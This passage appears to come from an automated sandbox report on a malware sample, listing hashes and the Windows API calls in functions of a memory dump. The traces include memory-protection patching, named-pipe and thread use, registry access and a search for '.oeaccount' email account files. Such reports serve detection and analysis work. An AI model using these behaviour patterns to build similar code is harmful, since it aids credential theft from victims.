  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
